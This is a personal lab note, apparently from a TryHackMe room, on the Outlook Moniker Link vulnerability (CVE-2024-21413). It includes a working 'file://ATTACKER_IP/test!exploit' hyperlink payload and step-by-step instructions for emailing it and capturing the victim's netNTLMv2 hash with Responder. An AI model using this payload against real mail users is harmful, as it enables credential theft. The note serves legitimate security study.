This vulnerability bypasses the Outlook's security mechanisms when handling a specific type of hyperlink known as Moniker link This vulnerability bypasses the Outlook's security mechanisms when handling a specific type of hyperlink known as Moniker link. [[Metasploit - msfconsole]]
An attacker can abuse this by sending a malicious link that contains this moniker link to a victim, resulting in outlook sending the user's NTLM credentials to the attacker once the hyperlink is clicked [[Moniker Link (CVE-2024-21413)]]
#Protocol/NTLM #Protocol/SMB
| Publish date | Feb 13th, 2025 |
|---|---|
| MS article | https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413 |
| Impact | Remote Code Execution & Credential Leak |
| Severity | Critical |
Learning Objectives
- How the vulnerability works
- Understand Outlook's "Protected View"
- Using the vulnerability to leak credentials from an Outlook client
- Detection and mitigation measures
Moniker link: Outlook can render emails as HTML. It can parse hyperlinks such as HTTP and HTTPs, however, it can also open specific links such as Moniker links
Outlook's "protected view", opens attachments, hyperlinks and similar content in read-only mode blocking things such as macros By using "file://" moniker link in our hyperlink, we can instruct outlook to attempt to access a file on a network share
<a href="file://ATTACKER_IP/test">Click me</a>
The #Protocol/SMB is used, which involves using local credentials for authentication. However, outlook's protected view will block this attempt. The vulnerability that can be exploited here is by modifying the moniker link with a special character "!" and adding a piece of text which would then bypass the outlook's protected view and will try to access the file sharing through SMB protocol authentication over the netNTLMv2 example:
<a href="file://ATTACKER_IP/test!exploit">Click me</a>
Note the share does not need to exist on the remote device, as an authentication attempt will be attempted regardless, leading to the victim's Windows netNTLMv2 hash being sent to the attacker.
Platform: THM
Category: [[Moniker Link (CVE-2024-21413)]]
Difficulty: Easy
Date: 2026/04/04
The objective, as the attacker, is to craft an email to the victim with a Moniker Link that bypasses Outlook's "Protected View", where the victim’s client will attempt to load a file from our attacking machine, resulting in the victim’s netNTLMv2 hash being captured.
SMB uses NTLM (or Kerberos) to authenticate users before granting access to shared resources. When you connect to \\server\share, SMB handles the file transfer while NTLM/Kerberos handles proving who you are.
- We will have two machines, the attacker and the victim machine
- Take an attacker and victim email. For attacker, need to setup their own #Protocol/SMTP server
- To authenticate to the server, attacker needs a password
- attacker will craft an email with moniker link and will email that to the victim, which upon clicking would bypass the Outlook's protected view, upon which the victim's system will load a file from attacker's machine, resulting in the capture of victim's netNTLMv2 hash
- Responder is initiated on the attacker's machine which would poisons network responses to capture NTLM hashes #technique/T1557-001
- Create a new file on the AttackBox using terminal
nano exploit.py - We will need to do some initial setup on Our AttackBox before running the Python script:
- Modify the Moniker Link (line #12) in our PoC to reflect the IP address of our AttackBox
- Replace the MAILSERVER placeholder on line #31 with MACHINE_IP
- Run the exploit using python3 filename.py. When prompted enter the attacker's password
- Victim will receive the email and clicks on "Click me" hyperlink
- Return to responder initiated on attacker's machine
- We will see that responder captures the victim's netNTLMv2 hash on attacker's screen
Commands used:
nano filename.py
# open text editor and paste the crafted email, while changing the attacker's IP and target IP 
python3 filename.py
# run the code and type the attacker password for mail server authentication post which the email will be delivered
responder -I interface
# select the appropriate interface on the attacker machine that would listen to the incoming netNTLMv2 hash credentials when the target machine clicks the moniker link
# capture the hash
- Key concept : the way outlook handles the external links using moniker architecture for seamless parsing of various hyperlinks, while enabling user to open the contents in a protected view in read only while blocking other macros
- Key concept : the way this protected view can be exploited by making slight changes to the moniker link, and the concept network sharing, where the functionality of SMB and NTLM has been exploited.
- Relevant MITRE ATT&CK technique :
